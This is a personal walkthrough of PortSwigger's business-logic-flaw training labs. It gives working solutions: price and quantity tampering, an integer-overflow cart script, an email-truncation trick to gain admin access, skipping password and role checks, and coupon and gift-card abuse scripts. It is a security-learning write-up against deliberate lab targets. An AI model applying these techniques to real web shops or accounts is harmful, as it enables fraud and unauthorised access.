Published on

Business Logic Labs Overview

Tools Used

  1. Burp Interceptor, Repeater and Intruder
  2. Python Scripts

Overview

  1. https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-excessive-trust-in-client-side-controls

while adding product in cart set its price in request as very low!!

  1. https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-high-level

We had to buy one leet jacket but here we could not set price. Hence we bought a thing for negative quantity and just bought one leet jacket

Store credit: $59.30

Home

|

My account

|

0

Your order is on its way!

Name    Price   Quantity

Lightweight "l33t" Leather Jacket   $1337.00    1

Single Use Food Hider   $86.42  -15

Total:  $40.70
  1. https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-low-level

Observation

quantity field can be between ( and including ) = [-1000000000, 99] and takes only whole number ( wrong !! actually it will have an integer value so [ - Integer, + Integer ]

actually it depends on the integer bit that is being used 32 bit or 16 bit,

if 16 bit then the range is -32,768 to +32,767

if 32 bit then the range is [-2147483648 to 2147483647]

we will target total price

Solution

Solution in lowLevel.py. Its just that we had to exploit integer overflow in total price.

So we kept on adding price of any item * 99 and then as it overflows we are in negative region

then we add again and wait till it comes close to zero and when its near 0 we bring it within

store credit that is 100 coded solution could have been more concise and better.

# hacky script not a mature way to do this but for a single lab it works
import requests
def find_between( s, first, last ):
    try:
        start = s.index( first ) + len( first )
        end = s.index( last, start )
        return s[start:end]
    except ValueError:
        return ""
burp0_url = "https://acac1fcc1f75107fc0bc96cc00e50035.web-security-academy.net:443/cart"
burp0_cookies = {"session": "c7pFdZwzFg3lpGem8KWRBHqPLBJbeEh3"}
burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "https://acac1fcc1f75107fc0bc96cc00e50035.web-security-academy.net/cart", "Content-Type": "application/x-www-form-urlencoded", "Upgrade-Insecure-Requests": "1", "Te": "trailers", "Connection": "close"}
# greatest positive integer for 16 bit is  +32,767
# but here we can add only 99 at a time, so +32,767 / 99 = 329.56
# so we will test integer overflow  
for i in range(1, 1000):
    print(i)
    burp0_data = {"productId": "1", "quantity": 2 , "redir": "CART"}
    result = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
    html = result.text
    price= find_between(html, "<th>-$","</th>")
    try:
        price = float(price) * -1
        print(price)
        if(price  < -2*1339 and price > -4*1339):
            break
    except Exception as e:
        print(e)
    
    print(price)
  1. https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-inconsistent-handling-of-exceptional-input

So eventually I had to view the solution 😢. Here we had to play with string length. So the backend only considers

first 255 characters of a string and truncates the request. So the email id is:

very-long-string-very-long-string-very-long-string-very-long-string-very-long-string-very-long-string-very-long-stringabcabcbabcabcabacabcabcabcabcabcabcabcabcabcabcabcaabcvery-long-string-very-long-very-long-string-very-long-very-long-st@dontwannacry.com.exploit-ac041ff21ee42bb8c00c20b901ea00da.web-security-academy.net

Which is 321 characters. after we truncate it till 255 characters we get email id a very big string@dontwannacry.com, which is staff email id and required to access admin account. Hence we have solved the lab

  1. A very interesting lab https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-weak-isolation-on-dual-use-endpoint

from theory on page https://portswigger.net/web-security/logic-flaws/examples

under heading >> Users won't always supply mandatory input

The request to change user password via change-password request takes this from

POST /my-account/change-password HTTP/1.1
....
csrf=TnvFiRt2yrF7ZsTAZ5CEtnFHEj9LNk9d&username=administrator&curren-password=peter&new-password-1=peter&new-password-2=peter

HERE ITS NOT NECESSARY TO SEND current-password parameter !!!

  1. A very tiring but interesting lab https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-insufficient-workflow-validation

    1. Basic workflow, add products to cart > add valid coupon > checkout ( if value less than store credit )
    2. We cannot checkout l33t jacket as its value 1337 is higher than store credit, which is 100
    3. So, what eventually we did was add a product which is lower than 100 and do checkout on it
    4. Then after you have done checkout add your leet jacket and it will be added to your order
    Untitled

    Untitled

    Untitled

  2. https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-authentication-bypass-via-flawed-state-machine

    SOLVED IT !!

    MY SOLUTION

    1. Logged in and then in role-selector I send role as "admin"
    2. I logged out and then logged in again but instead of getting redirected to role-selector I redirected my self to /admin . I believe the backend when redirects to /role-selector after login clears your previous role ( which I selected as admin )
      1. Then as I was redirected to /admin I was able to delete carlos ( sorry carlos😢 its just business )

    PORTSWIGGER SOLUTION

    1. With Burp running, complete the login process and notice that you need to select your role before you are taken to the home page. Use the content discovery tool to identify the /admin path.

    2. Try browsing to /admin directly from the role selection page and observe that this doesn't work.

    3. Log out and then go back to the login page. In Burp, turn on proxy intercept then log in. Forward the POST /login request. The next request is GET /role-selector. Drop this request and then browse to the lab's home page. Observe that your role has defaulted to the administrator role and you have access to the admin panel. Delete Carlos to solve the lab.

      OKAY SO I WAS WRONG THE DEFAULT ROLE IS ADMINISTRATOR

    Observation 23 Nov

    1. Logged in as wiener, then you are redirected to role-selector page and you select role and then you are properly logged in ( like you can see my account )
      1. If you again go to role-selector and you select a role you will get error "No login credentials"
      2. Now if you set role again , you are redirected to login and your session expires hence "my-account" page is not visible.
      3. If you just go to role-selector page and then to my-account page your session expires too.
      4. If you don't select a role in role-selector directly after login ( redirection ) you won't get access to my-account page and will be redirected to login page if you visit my account.

    Observations 22 Nov

    1. When you login it takes directly to role-selector. And then you select role.
    2. When you logout and login again you again have to select role
    3. The administrator page is at /admin
    4. In role-selector post request, you can send role as "administrator"
      1. when you are not logged in you get this response

        Untitled

      2. When you are logged in you are just re directed

  3. Lab https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-flawed-enforcement-of-business-rules

    1. two coupons NEWCUST5 and SIGNUP30 ( when you sign up for newsletter )

    Solution is

    Add code one after another ( SINGUP30 you get from signing up for newsletter and NEWCUST5 is readily avaialble )

    Untitled

  4. Lab url : https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-infinite-money

    1. Buy a product "Gift Card" ( with product id 2 ) and apply discount on it via code SIGNUP30 and then you will get a discounted card but the gift card value is 10. Hence use that code and refill your credit to value more than 100.
    2. Now continue doing this by adding multiple gift cards and accomodating enough store credit to purchase leet jacket

    Untitled

    #Used this code to apply gift card code.
    import requests
    giftCards = '''
    2DlHFSTMZY
    aUkZZ9nQP7
    rCoKrvDFVY
    8sv5pB8Tva
    aCG945Mzsa
    '''
    giftCards = giftCards.split()
    burp0_url = "https://ac7e1fea1f768fbac0c841c700630089.web-security-academy.net:443/gift-card"
    burp0_cookies = {"session": "kGqJ6lLJnEPma5B72BZLKKZTlYmqhNGy"}
    burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "https://ac7e1fea1f768fbac0c841c700630089.web-security-academy.net/my-account?id=wiener", "Content-Type": "application/x-www-form-urlencoded", "Upgrade-Insecure-Requests": "1", "Te": "trailers", "Connection": "close"}
    for card in giftCards:
        print(card)
        burp0_data = {"csrf": "Y8kdJyCdvwzvHEYTIJKraDXqW8GYXQh3", "gift-card": card}
        requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)